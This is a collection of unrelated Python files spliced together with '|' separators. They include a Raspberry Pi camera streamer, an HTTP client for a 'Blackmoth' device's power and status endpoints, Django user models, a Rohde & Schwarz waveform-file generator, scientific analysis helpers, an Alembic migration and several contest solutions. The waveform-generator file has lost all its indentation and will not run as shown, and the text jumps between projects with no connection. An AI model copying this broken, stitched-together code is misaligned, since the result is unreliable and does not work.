        self.recording = False

    def write(self, b):
        """Forward one chunk of raw frame data to ffmpeg (picamera calls this)."""
        self.converter.stdin.write(b)

    def flush(self):
        """Close ffmpeg's stdin (EOF) and wait for it to drain and exit."""
        print('Waiting for background conversion process to exit')
        self.converter.stdin.close()
        self.converter.wait()

    def close(self):
        # Releases only the read side; flush() handles stdin/process shutdown.
        self.converter.stdout.close()
class BroadcastThread(Thread):
    """Pumps ffmpeg's mpeg1 output to every connected websocket client."""

    def __init__(self, converter, websocket_server):
        super(BroadcastThread, self).__init__()
        self.converter = converter
        self.websocket_server = websocket_server

    def run(self):
        """Read converter stdout until EOF, broadcasting each chunk as binary."""
        try:
            while True:
                buf = self.converter.stdout.read1(32768)
                if buf:
                    self.websocket_server.server.manager.broadcast(buf, binary=True)
                elif self.converter.poll() is not None:
                    # Empty read and the process has exited: stream is over.
                    break
        finally:
            self.converter.stdout.close()
def main():
    """Wire camera -> ffmpeg converter -> websocket broadcast and stream until Ctrl-C."""
    print('Initializing camera')
    with picamera.PiCamera() as camera:
        camera.resolution = (WIDTH, HEIGHT)
        camera.framerate = FRAMERATE
        camera.vflip = VFLIP # flips image rightside up, as needed
        camera.hflip = HFLIP # flips image left-right, as needed
        camera.drc_strength = 'high'
        sleep(1) # camera warm-up time
        websocket_server = WebsocketServer(WIDTH, HEIGHT)
        output = CameraOutput(camera)
        broadcast_thread = BroadcastThread(output.converter, websocket_server)
        http_server = HttpServer(camera)
        print('Starting recording')
        # Raw YUV frames are delivered to CameraOutput.write(), which pipes
        # them to the background ffmpeg process.
        camera.start_recording(output, 'yuv')
        try:
            websocket_server.run()
            http_server.run()
            print('Initializing broadcast thread')
            broadcast_thread.start()
            print('Everything initialized. Streaming...')
            while True:
                # NOTE(review): wait_recording also surfaces camera errors,
                # unlike a plain sleep — confirm against picamera docs.
                camera.wait_recording(1)
        except KeyboardInterrupt:
            pass
        finally:
            # Tear down in reverse order of startup.
            print('Stopping recording')
            camera.stop_recording()
            print('Waiting for broadcast thread to finish')
            broadcast_thread.join()
            http_server.stop()
            websocket_server.stop()


if __name__ == '__main__':
    main()
|
"""
Blackmoth API class library will allow for code base in other applications to be cut down by a large amount.
Still not complete.
"""
import requests
import json
"""
GPSStream is still under development
"""
class GPSStream:
    """Consume a device's GPS JSON stream, keeping the most recent decoded fix.

    NOTE: the stream is read synchronously from __init__, so construction
    blocks until the HTTP stream ends or fails.
    """

    def __init__(self, ip):
        self.ip_entry_data = ip
        self.gps_stream_url = 'http://' + str(ip) + ':8080/gps/stream'
        self.stream_data = ''  # latest decoded JSON object from the stream
        self.gps_stream()

    def gps_stream(self):
        """Read the stream line by line; each non-empty line replaces stream_data.

        Returns 1 on failure (after printing an error) instead of raising.
        """
        try:
            stream = requests.get(self.gps_stream_url, stream=True)
            for line in stream.iter_lines():
                if line:
                    self.stream_data = json.loads(line.decode("utf-8"))
        except Exception:
            # BUG FIX: was a bare 'except:', which also swallows
            # KeyboardInterrupt/SystemExit; Exception lets those propagate.
            print('Error: BlackMothAPI: GPSStream: Unable to start stream')
            return 1
class PoEState:
    """Switch the device's PoE output on or off via its HTTP API."""

    def __init__(self, ip, state):
        self.ip_entry_data = ip
        self.state_change = state  # expected 'on' or 'off'
        self.poe_down_url = 'http://' + self.ip_entry_data + ':8080/shutdown/powerdown/poe/'
        self.poe_up_url = 'http://' + self.ip_entry_data + ':8080/shutdown/powerup/poe/'
        self.poe_set()

    def poe_set(self):
        """Issue the power-up/power-down request matching self.state_change."""
        if self.state_change == 'off':
            try:
                powerdown = requests.get(self.poe_down_url)
                print(powerdown)
            except Exception:
                # BUG FIX: narrowed bare 'except:' so KeyboardInterrupt/
                # SystemExit propagate instead of being silently swallowed.
                print('Error: BlackMothAPI: poe_set: powerdown')
        elif self.state_change == 'on':
            try:
                powerup = requests.get(self.poe_up_url)
                print(powerup)
            except Exception:
                # BUG FIX: narrowed bare 'except:' (see above).
                print('Error: BlackMothAPI: poe_set: powerup')
        else:
            print('Error: BlackMothAPI: poe_set: please check IP = str and state = str')
class ScreenState:
    """Switch the device's screen on or off via its HTTP API."""

    def __init__(self, ip, state):
        self.ip_entry_data = ip
        self.state_change = state  # expected 'on' or 'off'
        self.screen_down_url = 'http://' + self.ip_entry_data + ':8080/shutdown/powerdown/screen/'
        self.screen_up_url = 'http://' + self.ip_entry_data + ':8080/shutdown/powerup/screen/'
        self.screen_set()

    def screen_set(self):
        """Issue the power-up/power-down request matching self.state_change."""
        if self.state_change == 'off':
            try:
                powerdown = requests.get(self.screen_down_url)
                print(powerdown)
            except Exception:
                # BUG FIX: narrowed bare 'except:' so KeyboardInterrupt/
                # SystemExit propagate instead of being silently swallowed.
                print('Error: BlackMothAPI: screen_set: powerdown')
        elif self.state_change == 'on':
            try:
                powerup = requests.get(self.screen_up_url)
                print(powerup)
            except Exception:
                # BUG FIX: narrowed bare 'except:' (see above).
                print('Error: BlackMothAPI: screen_set: powerup')
        else:
            print('Error: BlackMothAPI: screen_set: please check IP = str and state = str')
class GSMState:
    """Fetch the device's GSM interface status (decoded JSON in interface_data)."""

    def __init__(self, ip):
        self.ip_entry_data = ip
        self.interface_url = 'http://' + self.ip_entry_data + ':8080/gsm/interface/'
        self.interface_data = ''  # decoded JSON payload, or '' if the fetch failed
        self.gsm_get()

    def gsm_get(self):
        """GET the interface endpoint; returns 1 on failure after printing an error."""
        try:
            get = requests.get(self.interface_url)
            gsm_data = json.loads(get.text)
            self.interface_data = gsm_data
        except Exception:
            # BUG FIX: narrowed bare 'except:' so KeyboardInterrupt/SystemExit
            # propagate instead of being silently swallowed.
            print('Error: BlackMothAPI: GSMState: GSM Please check IP = str')
            return 1
class FirmwareVersion:
    """Fetch the device's firmware version (decoded JSON in version_data)."""

    def __init__(self, ip):
        self.ip_entry_data = ip
        self.version_url = 'http://' + self.ip_entry_data + ':8080/config/version/'
        self.version_data = ''  # decoded JSON payload, or '' if the fetch failed
        self.version_get()

    def version_get(self):
        """GET the version endpoint; returns 1 on failure after printing an error."""
        try:
            get = requests.get(self.version_url)
            self.version_data = json.loads(get.text)
        except Exception:
            # BUG FIX: narrowed bare 'except:' so KeyboardInterrupt/SystemExit
            # propagate instead of being silently swallowed.
            print('Error: BlackMothAPI: FirmwareVersion: Please check IP = str')
            return 1
class CameraConf:
    """Fetch the device's camera configuration (decoded JSON in config_camera_data).

    NOTE(review): unlike the sibling classes, __init__ does NOT call
    config_camera() automatically — callers must invoke it themselves.
    Confirm whether that asymmetry is intentional before changing it.
    """

    def __init__(self, ip):
        self.ip_entry_data = ip
        self.config_camera_url = 'http://' + str(ip) + ':8080/config/camera/'
        self.config_camera_data = ''  # decoded JSON payload, or '' until fetched

    def config_camera(self):
        """GET the camera-config endpoint; returns 1 on failure after printing an error."""
        try:
            get = requests.get(self.config_camera_url)
            self.config_camera_data = json.loads(get.text)
        except Exception:
            # BUG FIX: narrowed bare 'except:' so KeyboardInterrupt/SystemExit
            # propagate instead of being silently swallowed.
            print('Error: BlackMothAPI: CameraConf: Please check IP = str')
            return 1
class SystemIds:
    """Fetch the device's system identifiers (decoded JSON in system_ids)."""

    def __init__(self, ip):
        self.ip_entry_data = ip
        self.system_ids_url = 'http://' + str(ip) + ':8080/system/ids/'
        self.system_ids = ''  # decoded JSON payload, or '' if the fetch failed
        self.get_system_ids()

    def get_system_ids(self):
        """GET the system-ids endpoint; prints an error on failure."""
        try:
            get = requests.get(self.system_ids_url)
            data = json.loads(get.text)
            self.system_ids = data
        except Exception:
            # BUG FIX: narrowed bare 'except:' so KeyboardInterrupt/SystemExit
            # propagate instead of being silently swallowed.
            print('Error: BlackmothAPI: SystemIds: Please check IP = str or Cannot reach: ' + str(self.ip_entry_data))
|
from django.db import models
from apps.web_config import *
#from apps.product.models import Product
# Create your models here.
# User login account
class UserAccount(models.Model):
    """User login account.

    The Chinese verbose_name strings are user-facing admin labels and are
    deliberately left untranslated.
    """
    nickname = models.CharField(verbose_name='昵称', max_length=120, unique=True, null=True)  # nickname
    phone = models.CharField(verbose_name='电话号码', max_length=120, unique=True, null=True, blank=True)  # phone number
    email = models.EmailField(verbose_name='邮箱', max_length=250, unique=True, null=True, blank=True)  # email
    # NOTE(review): looks like the raw password string is stored here —
    # confirm hashing happens before assignment.
    user_pwd = models.CharField(verbose_name='登录密码', max_length=250)  # login password
    log_time = models.DateTimeField(verbose_name='登录起始时间', auto_now_add=True)  # login start time
    create_time = models.DateTimeField(verbose_name='创建时间', auto_now_add=True)  # creation time
    # Account status: 0 = none, 1 = usable, 2 = able to pay,
    # 3 = extremely low user score, 4 = unusable.
    acc_status = models.IntegerField(verbose_name='帐号状态(num)', default=1)

    # Display names for admin menus/titles.
    class Meta:
        verbose_name = u"用户帐号"
        verbose_name_plural = verbose_name

    def __str__(self):
        # NOTE(review): nickname is nullable, so this may return None and make
        # str(obj) raise TypeError — confirm nickname is always populated.
        return self.nickname
# User profile storage (one-to-one with UserAccount)
class UserMessage(models.Model):
    """User profile details, one-to-one with UserAccount.

    The Chinese verbose_name strings are user-facing admin labels and are
    deliberately left untranslated.
    """
    nickname = models.CharField(verbose_name='昵称', max_length=120, unique=True, null=True)  # nickname
    signature = models.CharField(verbose_name='个性签名', max_length=250, default=STR_DEFAULT, null=True, blank=True)  # personal signature
    realname = models.CharField(verbose_name='真实姓名', blank=True, max_length=120, null=True, default=STR_NUM_DEFAULT)  # real name
    face = models.ImageField(verbose_name='头像', upload_to="image/%Y/%m", blank=True, null=True, default=FACE_DEFAULT)  # avatar
    sex = models.CharField(verbose_name='性别',max_length=8, null=True, default=STR_NUM_DEFAULT)  # gender
    # NOTE(review): auto_now=True rewrites 'birth' to today on every save —
    # a birthday field presumably wants a plain editable DateField; confirm.
    birth = models.DateField(verbose_name='生日', blank=True, auto_now=True)  # birthday
    # NOTE(review): max_length=8 looks too short for 18-character Chinese
    # national ID numbers; confirm intended format.
    sf_code = models.CharField(verbose_name='身份证号码', default=STR_NUM_DEFAULT, max_length=8, blank=True, null=True)  # national ID number
    is_member = models.NullBooleanField(verbose_name='是否是会员', default=BOOL_NULL_DEFAULT)  # is member?
    #user_account = models.ForeignKey(UserAccount, verbose_name='所属用户', on_delete=models.SET_NULL, blank=True, null=True)
    user_account = models.OneToOneField(UserAccount, verbose_name='所属用户', on_delete=models.CASCADE, primary_key=True)  # owning user
    user_id = models.IntegerField(verbose_name='用户id', null=True, blank=True)  # user id

    # Display names for admin menus/titles.
    class Meta:
        verbose_name = u"用户信息"
        verbose_name_plural = verbose_name

    def __str__(self):
        # "<nickname>'s profile" — NOTE(review): nickname is nullable; a None
        # value makes this concatenation raise TypeError.
        return self.nickname+'用户的资料'
# User status (one-to-one with UserAccount)
class UserStatus(models.Model):
    """User status flags, one-to-one with UserAccount.

    The Chinese verbose_name strings are user-facing admin labels and are
    deliberately left untranslated.
    """
    is_18 = models.NullBooleanField(verbose_name='满18岁?', default=BOOL_NULL_DEFAULT, blank=True, null=True)  # over 18?
    is_marry = models.NullBooleanField(verbose_name='是否结婚', default=BOOL_NULL_DEFAULT)  # married?
    is_house = models.NullBooleanField(verbose_name='是否有房', default=BOOL_NULL_DEFAULT)  # owns a house?
    is_car = models.NullBooleanField(verbose_name='是否有车', default=BOOL_NULL_DEFAULT)  # owns a car?
    credit_status = models.IntegerField(verbose_name='信誉状况(分)', default=INT_DEFAULT)  # credit score
    is_business = models.NullBooleanField(verbose_name='是否是商家', default=BOOL_NULL_DEFAULT)  # is merchant?
    is_real = models.NullBooleanField(verbose_name='是否实名认证', default=BOOL_NULL_DEFAULT)  # real-name verified?
    #user_account = models.ForeignKey(UserAccount, verbose_name='所属用户', on_delete=models.SET_NULL, blank=True, null=True)
    user_account = models.OneToOneField(UserAccount, verbose_name='所属用户', on_delete=models.CASCADE, primary_key=True)  # owning user
    user_id = models.IntegerField(verbose_name='用户id', null=True, blank=True)  # user id

    # Display names for admin menus/titles.
    class Meta:
        verbose_name = u"用户状态详情"
        verbose_name_plural = verbose_name

    def __str__(self):
        # "User ID: <id>'s status"
        return '用户ID:'+str(self.user_id)+'的状态'
# User spending record (one-to-one with UserAccount)
class UserMoneyCount(models.Model):
    """User spending record, one-to-one with UserAccount.

    The Chinese verbose_name strings are user-facing admin labels and are
    deliberately left untranslated.
    """
    user_account = models.OneToOneField(UserAccount, verbose_name='所属用户', on_delete=models.CASCADE, primary_key=True)  # owning user
    use_money_count = models.DecimalField(verbose_name='在网站消费了多少钱', default=DECIMAL_DEFAULT_ZERO, max_digits=10, decimal_places=2)  # total spent on the site
    product_num = models.IntegerField(verbose_name='已买多少件商品', null=True)  # number of products bought
    email = models.EmailField(verbose_name='保存的邮箱', max_length=250, unique=True, null=True, blank=True)  # saved email
    create_time = models.DateTimeField(verbose_name='创建时间', auto_now_add=True)  # creation time
    data_status = models.IntegerField(verbose_name='数据状态', default=1)  # data status flag

    # Display names for admin menus/titles.
    class Meta:
        verbose_name = u"用户消费记录"
        verbose_name_plural = verbose_name

    def __str__(self):
        # "<email>'s spending record"
        return str(self.email)+'的消费记录'
|
import numpy as np
import datetime
class RSWaveformGenerator():
"""
Generates .wv files from I/Q for the AFQ 100B I/Q modulation generator
and related Rohde & Schwarz instruments
RSWaveformGenerator(instrument)
Initialises waveform generator ready to upload to qcodes instrument
If instrument is not provided, can generate and save .wv files
but not upload to instrument
self.generate_wave(I_data,Q_data,clock,markers)
Generates waveform (R&S .wv format) from input data
I_data must be vector of values in range (-1,1)
Q_data must be vector of values in range (-1,1)
clock is AWG sample rate, from 1kHz to 300MHz, or 600MHz
markers is dict with entries 'marker1','marker2','marker3','marker4'
Not all entries required, can omit uncessary marker lists
Marker lists take form position/value [[0,0],[10,1],[50,0]]
Example:
markers = {}
markers['marker1'] = [[0,0],[10,1],[50,0]]
markers['marker2'] = [[0,1],[50,0]]
markers['marker3'] = [[0,0]]
Marker voltages reset to 0 immediately after all marker waveforms (not IQ waveform) end
self.upload_wave()
Uploads waveform from memory self.waveform to instrument and autoplays
Change self.instrument_directory and self.instrument_filename to change upload location
self.save_wave_file(local_filename)
Saves self.waveform as .wv file to local_filename
self.read_wave_file(local_filename)
Reads contents of .wv file local_filename to self.waveform
self.upload_wave_file(local_filename)
Reads contents of .wv file local_filename to self.waveform
then uploads to instrument and autoplays
"""
def __init__(self,instrument=None):
self.instrument = instrument
self.instrument_directory = 'D:\\TEMP\\'
self.instrument_filename = 'temp.wv'
self.instrument_filepath = 'D:\\TEMP\\temp.wv'
self.comment = ''
self.copyright = ''
self.normalise = False
self.checks = False
self.waveform = None
self.max_samples = 100e6 #512e6 #Device memory 512MSa but generating long waveform is too memory intensive
def generate_wave(self,I_data,Q_data,clock,markers=None):
# Sanity checks
self.waveform = None
I_data_len = len(I_data)
Q_data_len = len(Q_data)
if I_data_len > self.max_samples:
raise ValueError('Number of samples {} exceeds max_samples {}'.format(I_data_len,self.max_samples))
if I_data_len != Q_data_len:
raise ValueError('I_data and Q_data are not same length ({},{})'.format(I_data_len,Q_data_len))
I_data = np.array(I_data,dtype=np.single)
Q_data = np.array(Q_data,dtype=np.single)
# Format I,Q vectors into IQIQIQ...
IQ_data_len = 2*I_data_len
IQ_data = np.empty(IQ_data_len,dtype=np.single)
IQ_data[0::2] = I_data
IQ_data[1::2] = Q_data
# If scaling is desired, normalise to peak vector length of 1.0
if self.normalise:
max_IQ_data = np.max(np.abs( I_data + 1j*Q_data ))
IQ_data = IQ_data / max_IQ_data
peak = 1.0
max_IQ_data = 1.0
rms = np.sqrt(np.mean(np.square(IQ_data[0::2])+np.square(IQ_data[1::2]))) / max_IQ_data
crf = 20*np.log10(peak/rms) # Crest factor
else:
# If not scaling, ought to check for clipping (outside +/-1)
# But this is really memory intensive for large sample lengths
# Particularly the third one
# So I made these optional
if self.checks:
if np.max(I_data) > 1.0 or np.min(I_data) < -1.0:
raise ValueError('I_data must be in range -1 to +1 if auto scaling is disabled.')
if np.max(Q_data) > 1.0 or np.min(Q_data) < -1.0:
raise ValueError('Q_data must be in range -1 to +1 if auto scaling is disabled.')
if np.max(np.abs( I_data + 1j*Q_data )) > 1.0:
raise ValueError('I/Q vector length must be <1 if auto scaling is disabled.')
peak = 1.0
rms = 1.0
crf = 0.0
# Convert IQ_data to int16
# Range is 16 bits for analogue outputs
# +1.0 ---> +32767
# 0.0 ---> 0
# -1.0 ---> -32767
IQ_data = np.floor(IQ_data*32767+0.5).astype(np.int16)
# Generate wv file header and encode to binary
header_tag_str = '{TYPE: SMU-WV, 0}'
comment_str = ('' if self.comment == '' else '{{COMMENT: {}}}'.format(self.comment))
copyright_str = ('' if self.copyright == '' else '{{COPYRIGHT: {}}}'.format(self.copyright))
origin_info_str = '{ORIGIN INFO: Python}' # This field is ignored by the instrument
level_offs_str = '{{LEVEL OFFS: {}, {}}}'.format(20*np.log10(1.0/rms),20*np.log10(1.0/peak))
date_str = '{{DATE: {};{}}}'.format(datetime.datetime.now().isoformat()[0:10],datetime.datetime.now().isoformat()[11:19])
clock_str = '{{CLOCK: {}}}'.format(clock)
samples_str = '{{SAMPLES: {}}}'.format(I_data_len)
waveform_header = '{}{}{}{}{}{}{}{}'.format(header_tag_str,comment_str,copyright_str,origin_info_str,level_offs_str,date_str,clock_str,samples_str).encode('ascii')
# Generate markers
waveform_markers = ''
if markers:
if type(markers) != dict:
raise ValueError("Markers must be dict. Allowed entries are 'marker1','marker2','marker3','marker4'")
waveform_markers += '{{CONTROL LENGTH: {}}}'.format(IQ_data_len)
if 'marker1' in markers:
waveform_markers += '{{MARKER LIST 1: {}}}'.format(self._generate_marker_string(markers['marker1']))
if 'marker2' in markers:
waveform_markers += '{{MARKER LIST 2: {}}}'.format(self._generate_marker_string(markers['marker2']))
if 'marker3' in markers:
waveform_markers += '{{MARKER LIST 3: {}}}'.format(self._generate_marker_string(markers['marker3']))
if 'marker4' in markers:
waveform_markers += '{{MARKER LIST 4: {}}}'.format(self._generate_marker_string(markers['marker4']))
waveform_markers = waveform_markers.encode('ascii')
# Convert IQ_data to bitstring with length header
wv_file_IQ_data_bitstring = '{{WAVEFORM-{}: #'.format(2*IQ_data_len + 1).encode('ascii') + IQ_data.tostring() + '}'.encode('ascii')
# Construct wv binary file in memory
self.waveform = waveform_header + waveform_markers + wv_file_IQ_data_bitstring
print('Waveform generated: {} samples, {} bytes'.format(I_data_len,len(self.waveform)))
#return self.wv_file_bitstring
def upload_wave(self):
if not self.waveform:
raise ValueError('Waveform not generated. Please run generate_wave() or read_wave_file()')
if not self.instrument:
raise ValueError('Instrument not provided. Please call RSWaveformGenerator(instrument)')
self.instrument_filepath = self.instrument_directory + self.instrument_filename
# Calculate binary data block prefix
# Takes form of '#213'
# First number is how many digits subsequent number has
# Second number is number of subsequent bytes
num_bytes = len(self.waveform)
num_digits_bytes = len(str(num_bytes))
binary_prefix = '\',#{}{}'.format(num_digits_bytes,num_bytes)
print('Uploading {} bytes...'.format(num_bytes),end = '')
#SCPI_command = ':SOUR:WAV:DATA \'' + self.instrument_filepath + binary_prefix
SCPI_command = 'MMEM:DATA \'' + self.instrument_filepath + binary_prefix
self.instrument.visa_handle.write_raw(SCPI_command.encode('ascii')+self.waveform)
self.instrument.wvfile(self.instrument_filepath)
print('\rUploaded {} bytes to {}'.format(num_bytes,self.instrument_filepath))
def save_wave_file(self,local_filename):
if not self.waveform:
raise ValueError('Waveform not generated. Please run generate_wave() or read_wave_file()')
with open(local_filename, mode='wb') as wv:
wv.write(self.waveform)
def read_wave_file(self,local_filename):
with open(local_filename, mode='rb') as wv:
self.waveform = wv.read()
def upload_wave_file(self,local_filename):
self.read_wave_file(local_filename)
self.upload_wave()
def _generate_marker_string(self,marker_array):
if np.shape(marker_array)[1] != 2:
raise ValueError('Marker array must be in format [[0,0],[20,1],[50,0]], even if one entry')
marker_string = ''
for point in marker_array:
marker_string += '{}:{};'.format(point[0],point[1])
return marker_string.rstrip(';') |
import logging
log = logging.getLogger(__name__)
import re
import numpy
import itertools
import westpa
from oldtools.aframe import AnalysisMixin
class KineticsAnalysisMixin(AnalysisMixin):
    """Command-line mixin for kinetics analysis.

    Parses --dt plus the --initial-bins/--final-bins selections used to
    restrict which transitions are included in kinetics statistics.
    """

    def __init__(self):
        super(KineticsAnalysisMixin,self).__init__()
        self.dt = None
        self.analysis_initial_bins = None
        self.analysis_final_bins = None

    def add_args(self, parser, upcall = True):
        """Add kinetics options to parser, chaining to cooperating mixins first."""
        if upcall:
            try:
                upfunc = super(KineticsAnalysisMixin,self).add_args
            except AttributeError:
                pass
            else:
                upfunc(parser)
        group = parser.add_argument_group('kinetics analysis options')
        group.add_argument('--dt', dest='dt', type=float, default=1.0,
                           help='Assume input data has a time spacing of DT (default: %(default)s).')
        group.add_argument('--initial-bins', dest='ibins_string', metavar='ILIST',
                           help='''Only calculate statistics for transitions starting in bin ILIST. This may be specified as a
                           comma-separated list of integers or ranges, as in "0,2-4,5,9"''')
        group.add_argument('--final-bins', dest='fbins_string', metavar='FLIST',
                           help='''Only calculate statistics for transitions ending in bin FLIST. This may be specified as a
                           comma-separated list of integers or ranges, as in "0,2-4,5,9"''')

    def process_args(self, args, upcall = True):
        """Record parsed options and report the effective bin selections."""
        self.dt = args.dt
        westpa.rc.pstatus('Assuming input data timestep of {:g}'.format(self.dt))
        if args.ibins_string:
            self.analysis_initial_bins = self.parse_bin_range(args.ibins_string)
            westpa.rc.pstatus('Will calculate kinetics data from transitions beginning in the following bins: {!s}'
                              .format(sorted(self.analysis_initial_bins)))
        else:
            westpa.rc.pstatus('Will calculate kinetics data from transitions beginning in any bin.')
        if args.fbins_string:
            self.analysis_final_bins = self.parse_bin_range(args.fbins_string)
            westpa.rc.pstatus('Will calculate kinetics data from transitions ending in the following bins: {!s}'
                              .format(sorted(self.analysis_final_bins)))
        else:
            westpa.rc.pstatus('Will calculate kinetics data from transitions ending in any bin.')
        if upcall:
            try:
                upfunc = super(KineticsAnalysisMixin,self).process_args
            except AttributeError:
                pass
            else:
                upfunc(args)

    def parse_bin_range(self, range_string):
        """Parse a "0,2-4,9" style string into a set of bin indices.

        Raises ValueError on any malformed field.
        """
        try:
            entries = set()
            # BUG FIX: the regexes are now raw strings; '\s' in a plain string
            # literal is an invalid escape sequence (DeprecationWarning today,
            # a SyntaxError in future Python versions).
            fields = re.split(r'\s*,\s*', range_string)
            for field in fields:
                if '-' in field:
                    lb, ub = list(map(int,re.split(r'\s*-\s*', field)))
                    entries.update(list(range(lb,ub+1)))
                else:
                    entries.add(int(field))
        except (ValueError,TypeError):
            raise ValueError('invalid bin range string {!r}'.format(range_string))
        else:
            return entries

    def check_bin_selection(self, n_bins = None):
        '''Check to see that the bin ranges selected by the user conform to the available bins (i.e.,
        bin indices are within the permissible range). Also assigns the complete bin range if the
        user has not explicitly limited the bins to be considered.'''
        n_bins = n_bins or self.n_bins
        if self.analysis_initial_bins:
            if (numpy.array(list(self.analysis_initial_bins)) >= n_bins).any():
                raise ValueError('One or more initial bin indices is out of range.')
        else:
            self.analysis_initial_bins = set(range(n_bins))
        if self.analysis_final_bins:
            if (numpy.array(list(self.analysis_final_bins)) >= n_bins).any():
                raise ValueError('One or more final bin indices is out of range.')
        else:
            self.analysis_final_bins = set(range(n_bins))

    @property
    def selected_bin_pair_iter(self):
        """Iterator over all selected (initial, final) bin index pairs."""
        return (tuple(pair) for pair in itertools.product(self.analysis_initial_bins,self.analysis_final_bins))
|
"""adds timestamp to posts
Revision ID: 39c16cd10ee8
Revises: 4907810d149c
Create Date: 2021-01-24 06:34:07.126310
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '39c16cd10ee8'
down_revision = '4907810d149c'
branch_labels = None
depends_on = None
def upgrade():
    """Add a nullable 'timestamp' column to the 'post' table."""
    # ### commands auto generated by Alembic - please adjust! ###
    # batch_alter_table keeps this compatible with SQLite's limited in-place
    # ALTER TABLE support.
    with op.batch_alter_table('post', schema=None) as batch_op:
        batch_op.add_column(sa.Column('timestamp', sa.DateTime(), nullable=True))

    # ### end Alembic commands ###
def downgrade():
    """Drop the 'timestamp' column from the 'post' table (reverse of upgrade)."""
    # ### commands auto generated by Alembic - please adjust! ###
    with op.batch_alter_table('post', schema=None) as batch_op:
        batch_op.drop_column('timestamp')

    # ### end Alembic commands ###
|
import cv2
import numpy as np
from shapely import affinity
from shapely.geometry import LineString, box
def get_patch_coord(patch_box, patch_angle=0.0):
    """Return the patch described by (center_x, center_y, height, width) as a
    shapely polygon, rotated by patch_angle degrees about its center."""
    center_x, center_y, height, width = patch_box
    half_w = width / 2.0
    half_h = height / 2.0
    rect = box(center_x - half_w, center_y - half_h,
               center_x + half_w, center_y + half_h)
    return affinity.rotate(rect, patch_angle,
                           origin=(center_x, center_y), use_radians=False)
def mask_for_lines(lines, mask, thickness, idx):
    """Draw one LineString onto `mask` using pixel value `idx` as the instance
    id; returns the mask and the next free instance id."""
    pts = np.asarray(list(lines.coords), np.int32).reshape((-1, 2))
    cv2.polylines(mask, [pts], False, color=idx, thickness=thickness)
    return mask, idx + 1
def line_geom_to_mask(layer_geom, confidence_levels, local_box, canvas_size, thickness, idx):
    """Rasterize (line, confidence) pairs into a per-instance mask.

    Each line is clipped to the patch, shifted/scaled into canvas pixel
    coordinates, and drawn with a unique integer id starting at `idx`.
    Confidences of lines that intersect the patch are appended to
    confidence_levels. Returns (mask, next free instance id).
    """
    patch_x, patch_y, patch_h, patch_w = local_box
    patch = get_patch_coord(local_box)
    canvas_h = canvas_size[0]
    canvas_w = canvas_size[1]
    scale_height = canvas_h / patch_h
    scale_width = canvas_w / patch_w
    # Translate patch center to the origin of the canvas.
    trans_x = -patch_x + patch_w / 2.0
    trans_y = -patch_y + patch_h / 2.0
    map_mask = np.zeros(canvas_size, np.uint8)
    for line, confidence in layer_geom:
        new_line = line.intersection(patch)
        if not new_line.is_empty:
            new_line = affinity.affine_transform(new_line, [1.0, 0.0, 0.0, 1.0, trans_x, trans_y])
            new_line = affinity.scale(new_line, xfact=scale_width, yfact=scale_height, origin=(0, 0))
            confidence_levels.append(confidence)
            if new_line.geom_type == 'MultiLineString':
                # BUG FIX: mask_for_lines takes (lines, mask, thickness, idx)
                # but was called with idx and thickness swapped, drawing with a
                # growing line width and a constant instance id.  Also iterate
                # .geoms: direct iteration over multi-part geometries was
                # removed in Shapely 2.0.
                for single_line in new_line.geoms:
                    map_mask, idx = mask_for_lines(single_line, map_mask, thickness, idx)
            else:
                # BUG FIX: same swapped-argument fix as above.
                map_mask, idx = mask_for_lines(new_line, map_mask, thickness, idx)
    return map_mask, idx
def rasterize_map(vectors, patch_size, canvas_size, max_channel, thickness):
    """Rasterize vectorized map elements into stacked per-class instance masks.

    Vectors with fewer than 2 points are skipped. Returns
    (masks stacked over the first max_channel classes, confidence levels).
    """
    confidence_levels = [-1]
    # Group (LineString, confidence) pairs by class id.
    grouped = {cls: [] for cls in range(max_channel + 1)}
    for vec in vectors:
        if vec['pts_num'] >= 2:
            pts = vec['pts'][:vec['pts_num']]
            grouped[vec['type']].append((LineString(pts), vec.get('confidence_level', 1)))

    local_box = (0.0, 0.0, patch_size[0], patch_size[1])
    idx = 1  # instance ids are shared across classes
    masks = []
    for cls in range(max_channel):
        mask, idx = line_geom_to_mask(grouped[cls], confidence_levels,
                                      local_box, canvas_size, thickness, idx)
        masks.append(mask)
    return np.stack(masks), confidence_levels
|
#Problem ID: CACHEHIT
#Problem Name: Cache Hits
# For each test case: with cache-block size b, count how many times the
# accessed block changes over the first m accesses (the first access is
# always a miss, so the count starts at 1).
for _ in range(int(input())):
    n, b, m = map(int, input().split())
    accesses = list(map(int, input().split()))
    misses = 1
    current_block = accesses[0] // b
    for address in accesses[:m]:
        blk = address // b
        if blk != current_block:
            misses += 1
            current_block = blk
    print(misses)
|
def feet_to_inches(feet):
    """Convert a length in feet to inches (12 inches per foot)."""
    inches_per_foot = 12
    return feet * inches_per_foot
print("Inches: ", format(feet_to_inches(float(input("Enter number of feet: "))), ",.2f"))
|
alp=["A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z"]
def valid(parties):
    """A seat distribution is valid iff every count is non-negative and no
    party holds a strict majority (more than half of all remaining seats)."""
    total = sum(parties)
    return all(0 <= seats <= total / 2 for seats in parties)
def solve(parties):
    # Backtracking search for an evacuation order: repeatedly remove one or
    # two members (same party doubled, single, or a cross-party pair) such
    # that after every step no party holds a strict majority (see valid()).
    # Mutates `parties` in place but restores it on backtrack.  Returns the
    # list of step labels (letters from `alp`) or None if no order exists.
    if valid(parties) and sum(parties)==0:
        return []
    # Try parties in decreasing seat-count order (k-th largest first).
    for k in range(len(parties)):
        m=sorted(parties)[-(k+1)]
        m=[i for i,j in enumerate(parties) if j==m]
        for n in m:
            # Option 1: remove two members of party n at once.
            parties[n]-=2
            if valid(parties):
                tmp=solve(parties)
                if tmp!=None:
                    return [alp[n]*2]+tmp
            parties[n]+=2
            # Option 2: remove a single member of party n.
            parties[n]-=1
            if valid(parties):
                tmp=solve(parties)
                if tmp!=None:
                    return [alp[n]]+tmp
            # Option 3: remove one member of n together with one of party x.
            for x in range(len(parties)):
                parties[x]-=1
                if valid(parties):
                    tmp=solve(parties)
                    if tmp!=None:
                        return [alp[n]+alp[x]]+tmp
                parties[x]+=1
            parties[n]+=1
    return None
# Python 2 driver: reads T test cases; each case is one line with the party
# count (ignored — the list length implies it) and one line of seat counts.
t = int(raw_input()) # read a line with a single integer
for i in xrange(1, t + 1):
    raw_input()  # number of parties; unused
    parties=[int(k) for k in raw_input().split(' ')]
    print "Case #"+str(i)+": "+' '.join(solve(parties))
|
# -*- coding: utf-8 -*-
# Odoo addon manifest for the "Dogma Partner Fields" module.
